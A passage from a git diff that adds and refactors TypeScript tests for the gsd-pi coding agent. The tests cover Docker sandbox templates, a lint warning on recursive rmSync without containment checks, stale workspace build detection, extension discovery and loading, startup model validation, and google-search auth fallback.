+    const recursiveInWindow = /recursive\s*:\s*true/;
+
+    for (const f of files) {
+      for (let i = 0; i < f.lines.length; i++) {
+        const line = f.lines[i];
+        if (line.trimStart().startsWith("//") || line.trimStart().startsWith("*")) continue;
+        if (!rmSyncLine.test(line)) continue;
+
+        // Check that recursive: true appears in the same statement (within 5 lines)
+        const stmtWindow = f.lines.slice(i, Math.min(i + 6, f.lines.length)).join(" ");
+        if (!recursiveInWindow.test(stmtWindow)) continue;
+
+        // Look within 20 lines before and after for a containment check
+        const contextStart = Math.max(0, i - 20);
+        const contextEnd = Math.min(f.lines.length, i + 20);
+        const context = f.lines.slice(contextStart, contextEnd).join("\n");
+
+        // Common containment patterns: isInside, startsWith, includes("worktree"),
+        // path comparison, or the word "containment" / "safety" in a comment
+        const hasContainment =
+          /isInside|startsWith\s*\(|\.includes\s*\(|normalize\s*\(|resolve\s*\(.*===|containment|safety check/i.test(
+            context,
+          );
+
+        if (hasContainment) continue;
+
+        violations.push({
+          file: f.rel,
+          line: i + 1,
+          text: line,
+          reason: "recursive rmSync without nearby containment validation (see isInsideWorktreesDir pattern)",
+        });
+      }
+    }
+
+    if (violations.length > 0) {
+      console.log(
+        `[WARN] ${violations.length} recursive rmSync without containment check (non-blocking):\n\n${formatViolations(violations)}`,
+      );
+    }
+    // Warn only — do not fail
+  });
+});
diff --git a/src/tests/docker-template.test.ts b/src/tests/docker-template.test.ts
new file mode 100644
index 000000000..5fe53b556
--- /dev/null
+++ b/src/tests/docker-template.test.ts
@@ -0,0 +1,110 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync, existsSync } from "node:fs";
+import { resolve } from "node:path";
+
+const root = process.cwd();
+
+function readFile(relativePath: string): string {
+  const full = resolve(root, relativePath);
+  assert.ok(existsSync(full), `expected ${relativePath} to exist`);
+  return readFileSync(full, "utf-8");
+}
+
+// ── Dockerfile.sandbox ──
+
+test("docker/Dockerfile.sandbox exists and uses Node 24 base", () => {
+  const content = readFile("docker/Dockerfile.sandbox");
+  assert.match(content, /FROM node:24/);
+});
+
+test("docker/Dockerfile.sandbox installs gsd-pi globally", () => {
+  const content = readFile("docker/Dockerfile.sandbox");
+  assert.match(content, /npm install -g gsd-pi/);
+});
+
+test("docker/Dockerfile.sandbox creates a non-root user", () => {
+  const content = readFile("docker/Dockerfile.sandbox");
+  assert.match(content, /useradd/);
+});
+
+test("docker/Dockerfile.sandbox exposes port 3000", () => {
+  const content = readFile("docker/Dockerfile.sandbox");
+  assert.match(content, /EXPOSE 3000/);
+});
+
+test("docker/Dockerfile.sandbox installs git", () => {
+  const content = readFile("docker/Dockerfile.sandbox");
+  assert.match(content, /git/);
+});
+
+// ── docker-compose.yaml (minimal) ──
+
+test("docker/docker-compose.yaml exists and defines gsd service", () => {
+  const content = readFile("docker/docker-compose.yaml");
+  assert.match(content, /services:/);
+  assert.match(content, /gsd:/);
+});
+
+test("docker/docker-compose.yaml mounts workspace volume", () => {
+  const content = readFile("docker/docker-compose.yaml");
+  assert.match(content, /\/workspace/);
+});
+
+test("docker/docker-compose.yaml references Dockerfile.sandbox", () => {
+  const content = readFile("docker/docker-compose.yaml");
+  assert.match(content, /Dockerfile\.sandbox/);
+});
+
+test("docker/docker-compose.yaml maps port 3000", () => {
+  const content = readFile("docker/docker-compose.yaml");
+  assert.match(content, /3000:3000/);
+});
+
+test("docker/docker-compose.yaml has no hardcoded user directive", () => {
+  const content = readFile("docker/docker-compose.yaml");
+  assert.doesNotMatch(content, /^\s+user:/m);
+});
+
+// ── docker-compose.full.yaml (reference) ──
+
+test("docker/docker-compose.full.yaml exists with health check", () => {
+  const content = readFile("docker/docker-compose.full.yaml");
+  assert.match(content, /healthcheck:/);
+});
+
+test("docker/docker-compose.full.yaml documents PUID/PGID", () => {
+  const content = readFile("docker/docker-compose.full.yaml");
+  assert.match(content, /PUID/);
+  assert.match(content, /PGID/);
+});
+
+// ── .env.example ──
+
+test("docker/.env.example exists and lists ANTHROPIC_API_KEY", () => {
+  const content = readFile("docker/.env.example");
+  assert.match(content, /ANTHROPIC_API_KEY/);
+});
+
+test("docker/.env.example lists OPENAI_API_KEY", () => {
+  const content = readFile("docker/.env.example");
+  assert.match(content, /OPENAI_API_KEY/);
+});
+
+// ── .dockerignore ──
+
+test(".dockerignore exists at project root", () => {
+  const content = readFile(".dockerignore");
+  assert.match(content, /node_modules/);
+  assert.match(content, /\.env/);
+  assert.match(content, /dist/);
+});
+
+// ── README ──
+
+test("docker/README.md exists and documents sandbox usage", () => {
+  const content = readFile("docker/README.md");
+  assert.match(content, /Docker Sandbox/i);
+  assert.match(content, /docker sandbox create/);
+  assert.match(content, /Network Allowlisting/i);
+});
diff --git a/src/tests/ensure-workspace-builds.test.ts b/src/tests/ensure-workspace-builds.test.ts
new file mode 100644
index 000000000..965d2348e
--- /dev/null
+++ b/src/tests/ensure-workspace-builds.test.ts
@@ -0,0 +1,156 @@
+import { describe, it, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, writeFileSync, mkdirSync, rmSync, utimesSync, statSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import { createRequire } from "node:module";
+
+const require = createRequire(import.meta.url);
+const { newestSrcMtime, detectStalePackages } = require("../../scripts/ensure-workspace-builds.cjs");
+
+describe("newestSrcMtime", () => {
+  let tmp: string;
+
+  beforeEach(() => { tmp = mkdtempSync(join(tmpdir(), "gsd-mtime-test-")); });
+  afterEach(() => { rmSync(tmp, { recursive: true, force: true }); });
+
+  it("returns 0 for a non-existent directory", () => {
+    assert.equal(newestSrcMtime(join(tmp, "does-not-exist")), 0);
+  });
+
+  it("returns 0 when directory has no .ts files", () => {
+    writeFileSync(join(tmp, "index.js"), "");
+    writeFileSync(join(tmp, "config.json"), "");
+    assert.equal(newestSrcMtime(tmp), 0);
+  });
+
+  it("returns the mtime of a single .ts file", () => {
+    const file = join(tmp, "index.ts");
+    writeFileSync(file, "");
+    const mtime = new Date("2024-01-15T10:00:00Z");
+    utimesSync(file, mtime, mtime);
+    assert.equal(newestSrcMtime(tmp), mtime.getTime());
+  });
+
+  it("returns the max mtime across multiple .ts files", () => {
+    const older = join(tmp, "a.ts");
+    const newer = join(tmp, "b.ts");
+    writeFileSync(older, "");
+    writeFileSync(newer, "");
+    utimesSync(older, new Date("2024-01-01T00:00:00Z"), new Date("2024-01-01T00:00:00Z"));
+    utimesSync(newer, new Date("2024-06-01T00:00:00Z"), new Date("2024-06-01T00:00:00Z"));
+    assert.equal(newestSrcMtime(tmp), new Date("2024-06-01T00:00:00Z").getTime());
+  });
+
+  it("recurses into subdirectories", () => {
+    const subdir = join(tmp, "nested", "deep");
+    mkdirSync(subdir, { recursive: true });
+    const file = join(subdir, "util.ts");
+    writeFileSync(file, "");
+    const mtime = new Date("2024-03-01T00:00:00Z");
+    utimesSync(file, mtime, mtime);
+    assert.equal(newestSrcMtime(tmp), mtime.getTime());
+  });
+
+  it("skips node_modules entirely", () => {
+    const nm = join(tmp, "node_modules", "some-pkg");
+    mkdirSync(nm, { recursive: true });
+    const nmFile = join(nm, "index.ts");
+    writeFileSync(nmFile, "");
+    const future = new Date("2099-01-01T00:00:00Z");
+    utimesSync(nmFile, future, future);
+    assert.equal(newestSrcMtime(tmp), 0);
+  });
+});
+
+describe("detectStalePackages", () => {
+  let tmp: string;
+
+  beforeEach(() => { tmp = mkdtempSync(join(tmpdir(), "gsd-stale-test-")); });
+  afterEach(() => { rmSync(tmp, { recursive: true, force: true }); });
+
+  /**
+   * Helper to create a fake workspace package with src/ and dist/ directories.
+   * Sets timestamps to simulate npm tarball extraction where src/ files can be
+   * 1 second newer than dist/ files.
+   */
+  function createFakePackage(
+    packagesDir: string,
+    pkgName: string,
+    opts: { srcNewerThanDist?: boolean; missingDist?: boolean } = {},
+  ): void {
+    const pkgDir = join(packagesDir, pkgName);
+    const srcDir = join(pkgDir, "src");
+    const distDir = join(pkgDir, "dist");
+    mkdirSync(srcDir, { recursive: true });
+    writeFileSync(join(srcDir, "index.ts"), "export const x = 1;");
+
+    if (!opts.missingDist) {
+      mkdirSync(distDir, { recursive: true });
+      writeFileSync(join(distDir, "index.js"), "export const x = 1;");
+    }
+
+    if (opts.srcNewerThanDist && !opts.missingDist) {
+      // Simulate npm tarball extraction: src/ is 1 second newer than dist/
+      const distTime = new Date("2024-06-01T00:00:00Z");
+      const srcTime = new Date("2024-06-01T00:00:01Z");
+      utimesSync(join(distDir, "index.js"), distTime, distTime);
+      utimesSync(join(srcDir, "index.ts"), srcTime, srcTime);
+    }
+  }
+
+  it("detects missing dist/ as stale regardless of .git presence", () => {
+    const packagesDir = join(tmp, "packages");
+    mkdirSync(packagesDir, { recursive: true });
+    createFakePackage(packagesDir, "test-pkg", { missingDist: true });
+
+    const result = detectStalePackages(tmp, ["test-pkg"]);
+    assert.deepEqual(result, ["test-pkg"]);
+  });
+
+  it("detects stale src > dist timestamps in a git repo (dev clone)", () => {
+    // Simulate a git repo by creating .git directory
+    mkdirSync(join(tmp, ".git"), { recursive: true });
+    const packagesDir = join(tmp, "packages");
+    mkdirSync(packagesDir, { recursive: true });
+    createFakePackage(packagesDir, "test-pkg", { srcNewerThanDist: true });
+
+    const result = detectStalePackages(tmp, ["test-pkg"]);
+    assert.deepEqual(result, ["test-pkg"]);
+  });
+
+  it("skips staleness check when not in a git repo (npm tarball install)", () => {
+    // No .git directory — simulates npm install from tarball
+    const packagesDir = join(tmp, "packages");
+    mkdirSync(packagesDir, { recursive: true });
+    createFakePackage(packagesDir, "test-pkg", { srcNewerThanDist: true });
+
+    // Even though src/ is newer than dist/, the script should NOT detect it
+    // as stale because we're in an npm tarball (no .git directory).
+    // The timestamp difference is an artifact of npm tarball extraction.
+    const result = detectStalePackages(tmp, ["test-pkg"]);
+    assert.deepEqual(result, [], "should not detect staleness in npm tarball installs (no .git)");
+  });
+
+  it("still detects missing dist/ in npm tarball installs", () => {
+    // No .git directory — simulates npm install from tarball
+    const packagesDir = join(tmp, "packages");
+    mkdirSync(packagesDir, { recursive: true });
+    createFakePackage(packagesDir, "test-pkg", { missingDist: true });
+
+    // Missing dist/ should always be detected, even in npm installs
+    const result = detectStalePackages(tmp, ["test-pkg"]);
+    assert.deepEqual(result, ["test-pkg"]);
+  });
+
+  it("returns empty array when dist/ is up to date", () => {
+    mkdirSync(join(tmp, ".git"), { recursive: true });
+    const packagesDir = join(tmp, "packages");
+    mkdirSync(packagesDir, { recursive: true });
+    createFakePackage(packagesDir, "test-pkg");
+    // Default: timestamps are equal (both set by writeFileSync at ~same time)
+
+    const result = detectStalePackages(tmp, ["test-pkg"]);
+    assert.deepEqual(result, []);
+  });
+});
diff --git a/src/tests/extension-discovery.test.ts b/src/tests/extension-discovery.test.ts
index b3744c5ba..03bc8bdd8 100644
--- a/src/tests/extension-discovery.test.ts
+++ b/src/tests/extension-discovery.test.ts
@@ -12,110 +12,89 @@ function makeTempDir(): string {
 }
 
 describe('resolveExtensionEntries', () => {
-  test('returns index.ts when no package.json exists', () => {
+  test('returns index.ts when no package.json exists', (t) => {
     const dir = makeTempDir()
-    try {
-      writeFileSync(join(dir, 'index.ts'), 'export default function() {}')
-      const entries = resolveExtensionEntries(dir)
-      assert.equal(entries.length, 1)
-      assert.ok(entries[0].endsWith('index.ts'))
-    } finally {
-      rmSync(dir, { recursive: true, force: true })
-    }
+    t.after(() => rmSync(dir, { recursive: true, force: true }));
+    writeFileSync(join(dir, 'index.ts'), 'export default function() {}')
+    const entries = resolveExtensionEntries(dir)
+    assert.equal(entries.length, 1)
+    assert.ok(entries[0].endsWith('index.ts'))
   })
 
-  test('returns index.js when no package.json and no index.ts', () => {
+  test('returns index.js when no package.json and no index.ts', (t) => {
     const dir = makeTempDir()
-    try {
-      writeFileSync(join(dir, 'index.js'), 'module.exports = function() {}')
-      const entries = resolveExtensionEntries(dir)
-      assert.equal(entries.length, 1)
-      assert.ok(entries[0].endsWith('index.js'))
-    } finally {
-      rmSync(dir, { recursive: true, force: true })
-    }
+    t.after(() => rmSync(dir, { recursive: true, force: true }));
+    writeFileSync(join(dir, 'index.js'), 'module.exports = function() {}')
+    const entries = resolveExtensionEntries(dir)
+    assert.equal(entries.length, 1)
+    assert.ok(entries[0].endsWith('index.js'))
   })
 
-  test('returns declared extensions from pi.extensions array', () => {
+  test('returns declared extensions from pi.extensions array', (t) => {
     const dir = makeTempDir()
-    try {
-      writeFileSync(join(dir, 'package.json'), JSON.stringify({
-        pi: { extensions: ['main.js'] }
-      }))
-      writeFileSync(join(dir, 'main.js'), 'module.exports = function() {}')
-      writeFileSync(join(dir, 'index.js'), 'should not be returned')
-      const entries = resolveExtensionEntries(dir)
-      assert.equal(entries.length, 1)
-      assert.ok(entries[0].endsWith('main.js'))
-    } finally {
-      rmSync(dir, { recursive: true, force: true })
-    }
+    t.after(() => rmSync(dir, { recursive: true, force: true }));
+    writeFileSync(join(dir, 'package.json'), JSON.stringify({
+      pi: { extensions: ['main.js'] }
+    }))
+    writeFileSync(join(dir, 'main.js'), 'module.exports = function() {}')
+    writeFileSync(join(dir, 'index.js'), 'should not be returned')
+    const entries = resolveExtensionEntries(dir)
+    assert.equal(entries.length, 1)
+    assert.ok(entries[0].endsWith('main.js'))
   })
 
-  test('returns empty array when pi manifest has no extensions (library opt-out)', () => {
+  test('returns empty array when pi manifest has no extensions (library opt-out)', (t) => {
     const dir = makeTempDir()
-    try {
-      writeFileSync(join(dir, 'package.json'), JSON.stringify({
-        name: '@gsd/cmux',
-        pi: {}
-      }))
-      writeFileSync(join(dir, 'index.js'), 'export function utility() {}')
-      const entries = resolveExtensionEntries(dir)
-      assert.equal(entries.length, 0, 'pi: {} should opt out of extension discovery')
-    } finally {
-      rmSync(dir, { recursive: true, force: true })
-    }
+    t.after(() => rmSync(dir, { recursive: true, force: true }));
+    writeFileSync(join(dir, 'package.json'), JSON.stringify({
+      name: '@gsd/cmux',
+      pi: {}
+    }))
+    writeFileSync(join(dir, 'index.js'), 'export function utility() {}')
+    const entries = resolveExtensionEntries(dir)
+    assert.equal(entries.length, 0, 'pi: {} should opt out of extension discovery')
   })
 
-  test('returns empty array when pi.extensions is an empty array', () => {
+  test('returns empty array when pi.extensions is an empty array', (t) => {
     const dir = makeTempDir()
-    try {
-      writeFileSync(join(dir, 'package.json'), JSON.stringify({
-        pi: { extensions: [] }
-      }))
-      writeFileSync(join(dir, 'index.js'), 'should not be returned')
-      const entries = resolveExtensionEntries(dir)
-      assert.equal(entries.length, 0)
-    } finally {
-      rmSync(dir, { recursive: true, force: true })
-    }
+    t.after(() => rmSync(dir, { recursive: true, force: true }));
+    writeFileSync(join(dir, 'package.json'), JSON.stringify({
+      pi: { extensions: [] }
+    }))
+    writeFileSync(join(dir, 'index.js'), 'should not be returned')
+    const entries = resolveExtensionEntries(dir)
+    assert.equal(entries.length, 0)
   })
 
-  test('falls back to index.ts when package.json has no pi field', () => {
+  test('falls back to index.ts when package.json has no pi field', (t) => {
     const dir = makeTempDir()
-    try {
-      writeFileSync(join(dir, 'package.json'), JSON.stringify({ name: 'some-pkg' }))
-      writeFileSync(join(dir, 'index.ts'), 'export default function() {}')
-      const entries = resolveExtensionEntries(dir)
-      assert.equal(entries.length, 1)
-      assert.ok(entries[0].endsWith('index.ts'))
-    } finally {
-      rmSync(dir, { recursive: true, force: true })
-    }
+    t.after(() => rmSync(dir, { recursive: true, force: true }));
+    writeFileSync(join(dir, 'package.json'), JSON.stringify({ name: 'some-pkg' }))
+    writeFileSync(join(dir, 'index.ts'), 'export default function() {}')
+    const entries = resolveExtensionEntries(dir)
+    assert.equal(entries.length, 1)
+    assert.ok(entries[0].endsWith('index.ts'))
   })
 })
 
 describe('discoverExtensionEntryPaths', () => {
-  test('skips library directories with pi: {} opt-out', () => {
+  test('skips library directories with pi: {} opt-out', (t) => {
     const root = makeTempDir()
-    try {
-      // Real extension
-      const extDir = join(root, 'my-ext')
-      mkdirSync(extDir)
-      writeFileSync(join(extDir, 'index.js'), 'module.exports = function() {}')
+    t.after(() => rmSync(root, { recursive: true, force: true }));
+    // Real extension
+    const extDir = join(root, 'my-ext')
+    mkdirSync(extDir)
+    writeFileSync(join(extDir, 'index.js'), 'module.exports = function() {}')
 
-      // Library with opt-out (like cmux)
-      const libDir = join(root, 'cmux')
-      mkdirSync(libDir)
-      writeFileSync(join(libDir, 'package.json'), JSON.stringify({ pi: {} }))
-      writeFileSync(join(libDir, 'index.js'), 'export function utility() {}')
+    // Library with opt-out (like cmux)
+    const libDir = join(root, 'cmux')
+    mkdirSync(libDir)
+    writeFileSync(join(libDir, 'package.json'), JSON.stringify({ pi: {} }))
+    writeFileSync(join(libDir, 'index.js'), 'export function utility() {}')
 
-      const paths = discoverExtensionEntryPaths(root)
-      assert.equal(paths.length, 1, 'should discover my-ext but skip cmux')
-      assert.ok(paths[0].includes('my-ext'))
-      assert.ok(!paths.some(p => p.includes('cmux')), 'cmux should not be discovered')
-    } finally {
-      rmSync(root, { recursive: true, force: true })
-    }
+    const paths = discoverExtensionEntryPaths(root)
+    assert.equal(paths.length, 1, 'should discover my-ext but skip cmux')
+    assert.ok(paths[0].includes('my-ext'))
+    assert.ok(!paths.some(p => p.includes('cmux')), 'cmux should not be discovered')
   })
 })
diff --git a/src/tests/extension-load-perf.test.ts b/src/tests/extension-load-perf.test.ts
new file mode 100644
index 000000000..0142ff5e2
--- /dev/null
+++ b/src/tests/extension-load-perf.test.ts
@@ -0,0 +1,87 @@
+/**
+ * Extension loading performance test
+ *
+ * Regression test for https://github.com/gsd-build/gsd-2/issues/2108
+ *
+ * Verifies that loading multiple extensions sharing common dependencies
+ * does NOT re-compile those dependencies for each extension. The jiti
+ * module cache must be shared across extension loads so that shared
+ * modules are compiled once.
+ *
+ * Uses the built dist/ (not raw TS source) because pi-coding-agent uses
+ * TypeScript features unsupported by --experimental-strip-types.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, writeFileSync, mkdirSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+// Import loadExtensions from the compiled dist (it IS re-exported from the
+// core/extensions barrel but not from the top-level index).
+// Use process.cwd() rather than import.meta.url-relative navigation — the
+// compiled test lands in dist-test/src/tests/, so relative paths differ between
+// source and compiled contexts. process.cwd() is always the repo root in CI.
+const loaderPath = join(
+  process.cwd(),
+  "packages", "pi-coding-agent", "dist", "core", "extensions", "loader.js",
+);
+
+test("loadExtensions shares module cache across extensions (perf regression #2108)", async () => {
+  const { loadExtensions } = await import(loaderPath);
+
+  // Create a temp directory with two extensions that import a shared helper
+  const tmp = mkdtempSync(join(tmpdir(), "gsd-perf-test-"));
+
+  try {
+    // Shared helper module
+    const sharedDir = join(tmp, "shared");
+    mkdirSync(sharedDir, { recursive: true });
+    writeFileSync(
+      join(sharedDir, "helper.ts"),
+      `export const SHARED_VALUE = "shared-${Date.now()}";\n`,
+    );
+
+    // Extension A — imports the shared helper
+    const extADir = join(tmp, "ext-a");
+    mkdirSync(extADir, { recursive: true });
+    writeFileSync(
+      join(extADir, "index.ts"),
+      `import { SHARED_VALUE } from "${join(sharedDir, "helper.ts").replace(/\\/g, "/")}";\n` +
+      `export default function(api: any) {\n` +
+      `  api.registerCommand("ext-a-cmd", { description: "test A " + SHARED_VALUE, handler: async () => {} });\n` +
+      `}\n`,
+    );
+
+    // Extension B — imports the same shared helper
+    const extBDir = join(tmp, "ext-b");
+    mkdirSync(extBDir, { recursive: true });
+    writeFileSync(
+      join(extBDir, "index.ts"),
+      `import { SHARED_VALUE } from "${join(sharedDir, "helper.ts").replace(/\\/g, "/")}";\n` +
+      `export default function(api: any) {\n` +
+      `  api.registerCommand("ext-b-cmd", { description: "test B " + SHARED_VALUE, handler: async () => {} });\n` +
+      `}\n`,
+    );
+
+    const paths = [join(extADir, "index.ts"), join(extBDir, "index.ts")];
+    const start = Date.now();
+    const result = await loadExtensions(paths, tmp);
+    const elapsed = Date.now() - start;
+
+    // Both extensions should load without errors
+    assert.strictEqual(result.errors.length, 0, `Extension errors: ${JSON.stringify(result.errors)}`);
+    assert.strictEqual(result.extensions.length, 2, "Expected 2 extensions to load");
+
+    // With shared jiti cache, loading 2 trivial extensions that share a
+    // dependency should complete in well under 5 seconds.
+    assert.ok(
+      elapsed < 5000,
+      `Extension loading took ${elapsed}ms — expected < 5000ms. ` +
+      `This suggests jiti module caching is not shared across extensions.`,
+    );
+  } finally {
+    try { rmSync(tmp, { recursive: true, force: true, maxRetries: 3 }); } catch { /* cleanup */ }
+  }
+});
diff --git a/src/tests/extension-model-validation.test.ts b/src/tests/extension-model-validation.test.ts
new file mode 100644
index 000000000..22ae05c1a
--- /dev/null
+++ b/src/tests/extension-model-validation.test.ts
@@ -0,0 +1,169 @@
+/**
+ * Regression test for #2626: Extension-provided models silently overwritten on startup.
+ *
+ * The startup model-validation logic must run AFTER extensions register their
+ * models in the ModelRegistry.  When validation runs before extensions load,
+ * extension-provided models (e.g. claude-code/claude-sonnet-4-6) are not yet
+ * in the registry, so configuredExists is always false and the user's choice
+ * is silently replaced with a built-in fallback.
+ *
+ * This test exercises `validateConfiguredModel()` directly (once extracted) to
+ * verify that:
+ *   (a) extension models present in the registry are preserved,
+ *   (b) genuinely missing models still trigger fallback selection.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, writeFileSync, rmSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+
+const { validateConfiguredModel } = await import("../startup-model-validation.js");
+
+/**
+ * Minimal stub of ModelRegistry with just getAll() / getAvailable().
+ */
+function fakeModelRegistry(models: Array<{ provider: string; id: string }>) {
+  const available = models.map((m) => ({
+    ...m,
+    name: m.id,
+    contextWindow: 128_000,
+    maxTokens: 4096,
+    reasoning: false,
+  }));
+  return {
+    getAll: () => available,
+    getAvailable: () => available,
+  };
+}
+
+/**
+ * Minimal stub of SettingsManager backed by plain objects.
+ */
+function fakeSettingsManager(initial: { provider?: string; model?: string }) {
+  let provider = initial.provider;
+  let model = initial.model;
+  let thinkingLevel = "off" as string;
+  return {
+    getDefaultProvider: () => provider,
+    getDefaultModel: () => model,
+    getDefaultThinkingLevel: () => thinkingLevel,
+    setDefaultModelAndProvider(p: string, m: string) {
+      provider = p;
+      model = m;
+    },
+    setDefaultThinkingLevel(level: string) {
+      thinkingLevel = level;
+    },
+    // Expose for assertions
+    get currentProvider() { return provider; },
+    get currentModel() { return model; },
+  };
+}
+
+// ──────────────────────────────────────────────────────────────────────
+// Test: extension-provided model in registry must NOT be overwritten
+// ──────────────────────────────────────────────────────────────────────
+test("validateConfiguredModel preserves extension-provided model when present in registry", () => {
+  const settings = fakeSettingsManager({
+    provider: "claude-code",
+    model: "claude-sonnet-4-6",
+  });
+
+  // Registry includes the extension model (simulating post-extension-load state)
+  const registry = fakeModelRegistry([
+    { provider: "openai", id: "gpt-5.4" },
+    { provider: "claude-code", id: "claude-sonnet-4-6" },
+  ]);
+
+  validateConfiguredModel(registry as any, settings as any);
+
+  assert.equal(settings.currentProvider, "claude-code",
+    "provider must remain the user-configured extension provider");
+  assert.equal(settings.currentModel, "claude-sonnet-4-6",
+    "model must remain the user-configured extension model");
+});
+
+// ──────────────────────────────────────────────────────────────────────
+// Test: genuinely removed model still triggers fallback
+// ──────────────────────────────────────────────────────────────────────
+test("validateConfiguredModel falls back when model is not in registry", () => {
+  const settings = fakeSettingsManager({
+    provider: "openai",
+    model: "grok-2",  // hypothetical removed model
+  });
+
+  const registry = fakeModelRegistry([
+    { provider: "openai", id: "gpt-5.4" },
+    { provider: "anthropic", id: "claude-opus-4-6" },
+  ]);
+
+  validateConfiguredModel(registry as any, settings as any);
+
+  // Should have been overwritten to one of the available models
+  assert.notEqual(settings.currentModel, "grok-2",
+    "stale model must be replaced by a fallback");
+  assert.ok(settings.currentProvider, "a fallback provider must be set");
+  assert.ok(settings.currentModel, "a fallback model must be set");
+});
+
+// ──────────────────────────────────────────────────────────────────────
+// Test: no configured model at all triggers fallback
+// ──────────────────────────────────────────────────────────────────────
+test("validateConfiguredModel picks a fallback when nothing is configured", () => {
+  const settings = fakeSettingsManager({
+    provider: undefined,
+    model: undefined,
+  });
+
+  const registry = fakeModelRegistry([
+    { provider: "openai", id: "gpt-5.4" },
+  ]);
+
+  validateConfiguredModel(registry as any, settings as any);
+
+  assert.equal(settings.currentProvider, "openai");
+  assert.equal(settings.currentModel, "gpt-5.4");
+});
+
+// ──────────────────────────────────────────────────────────────────────
+// Test: thinking level reset when model doesn't exist
+// ──────────────────────────────────────────────────────────────────────
+test("validateConfiguredModel resets thinking level when model was replaced", () => {
+  const settings = fakeSettingsManager({
+    provider: "openai",
+    model: "grok-2",
+  });
+  // Simulate non-off thinking level
+  settings.setDefaultThinkingLevel("high");
+
+  const registry = fakeModelRegistry([
+    { provider: "openai", id: "gpt-5.4" },
+  ]);
+
+  validateConfiguredModel(registry as any, settings as any);
+
+  assert.equal(settings.getDefaultThinkingLevel(), "off",
+    "thinking level must be reset to off when model was not found");
+});
+
+// ──────────────────────────────────────────────────────────────────────
+// Test: thinking level NOT reset when model exists
+// ──────────────────────────────────────────────────────────────────────
+test("validateConfiguredModel preserves thinking level when model exists", () => {
+  const settings = fakeSettingsManager({
+    provider: "openai",
+    model: "gpt-5.4",
+  });
+  settings.setDefaultThinkingLevel("high");
+
+  const registry = fakeModelRegistry([
+    { provider: "openai", id: "gpt-5.4" },
+  ]);
+
+  validateConfiguredModel(registry as any, settings as any);
+
+  assert.equal(settings.getDefaultThinkingLevel(), "high",
+    "thinking level must be preserved when configured model exists");
+});
diff --git a/src/tests/footer-component.test.ts b/src/tests/footer-component.test.ts
new file mode 100644
index 000000000..6873ef3ad
--- /dev/null
+++ b/src/tests/footer-component.test.ts
@@ -0,0 +1,17 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+const footerSource = readFileSync(
+  join(process.cwd(), "packages", "pi-coding-agent", "src", "modes", "interactive", "components", "footer.ts"),
+  "utf-8",
+);
+
+test("FooterComponent dims extension status lines to match the rest of the footer", () => {
+  assert.match(
+    footerSource,
+    /theme\.fg\("dim", statusLine\)/,
+    "extension status line should be wrapped in the dim footer color",
+  );
+});
diff --git a/src/tests/google-search-auth.repro.test.ts b/src/tests/google-search-auth.repro.test.ts
index 69198845b..5dac025fb 100644
--- a/src/tests/google-search-auth.repro.test.ts
+++ b/src/tests/google-search-auth.repro.test.ts
@@ -1,6 +1,6 @@
 import test from "node:test";
 import assert from "node:assert/strict";
-import googleSearchExtension from "../resources/extensions/google-search/index.ts";
+import googleSearchExtension from "../resources/extensions/google-search/index.js";
 
 function createMockPI() {
   const handlers: any[] = [];
@@ -38,7 +38,7 @@ function mockModelRegistry(oauthJson?: string) {
   };
 }
 
-test("fix: google-search uses OAuth if GEMINI_API_KEY is missing", async () => {
+test("fix: google-search uses OAuth if GEMINI_API_KEY is missing", async (t) => {
   const originalKey = process.env.GEMINI_API_KEY;
   delete process.env.GEMINI_API_KEY;
 
@@ -61,71 +61,64 @@ test("fix: google-search uses OAuth if GEMINI_API_KEY is missing", async () => {
     };
   };
 
-  try {
-    const pi = createMockPI();
-    googleSearchExtension(pi as any);
-
-    const oauthJson = JSON.stringify({ token: "mock-token", projectId: "mock-project" });
-    const mockCtx = {
-      ui: { notify() {} },
-      modelRegistry: mockModelRegistry(oauthJson),
-    };
-
-    await pi.fire("session_start", {}, mockCtx);
-    const registeredTool = (pi as any).registeredTool;
-    const result = await registeredTool.execute("call-1", { query: "test" }, new AbortController().signal, () => {}, mockCtx);
-
-    assert.equal(result.isError, undefined);
-    assert.ok(result.content[0].text.includes("Mocked AI Answer"));
-  } finally {
+  t.after(() => {
     global.fetch = originalFetch;
     process.env.GEMINI_API_KEY = originalKey;
-  }
+  });
+  const pi = createMockPI();
+  googleSearchExtension(pi as any);
+
+  const oauthJson = JSON.stringify({ token: "mock-token", projectId: "mock-project" });
+  const mockCtx = {
+    ui: { notify() {} },
+    modelRegistry: mockModelRegistry(oauthJson),
+  };
+
+  await pi.fire("session_start", {}, mockCtx);
+  const registeredTool = (pi as any).registeredTool;
+  const result = await registeredTool.execute("call-1", { query: "test" }, new AbortController().signal, () => {}, mockCtx);
+
+  assert.equal(result.isError, undefined);
+  assert.ok(result.content[0].text.includes("Mocked AI Answer"));
 });
 
-test("google-search warns if NO authentication is present", async () => {
+test("google-search warns if NO authentication is present", async (t) => {
   const originalKey = process.env.GEMINI_API_KEY;
   delete process.env.GEMINI_API_KEY;
 
-  try {
-    const pi = createMockPI();
-    googleSearchExtension(pi as any);
+  t.after(() => process.env.GEMINI_API_KEY = originalKey);
+  const pi = createMockPI();
+  googleSearchExtension(pi as any);
 
-    const notifications: any[] = [];
-    const mockCtx = {
-      ui: { notify(msg: string, level: string) { notifications.push({ msg, level }); } },
-      modelRegistry: mockModelRegistry(undefined),
-    };
+  const notifications: any[] = [];
+  const mockCtx = {
+    ui: { notify(msg: string, level: string) { notifications.push({ msg, level }); } },
+    modelRegistry: mockModelRegistry(undefined),
+  };
 
-    await pi.fire("session_start", {}, mockCtx);
-    assert.equal(notifications.length, 1);
-    assert.ok(notifications[0].msg.includes("No authentication set"));
+  await pi.fire("session_start", {}, mockCtx);
+  assert.equal(notifications.length, 1);
+  assert.ok(notifications[0].msg.includes("No authentication set"));
 
-    const registeredTool = (pi as any).registeredTool;
-    const result = await registeredTool.execute("call-2", { query: "test" }, new AbortController().signal, () => {}, mockCtx);
-    assert.equal(result.isError, true);
-    assert.ok(result.content[0].text.includes("No authentication found"));
-  } finally {
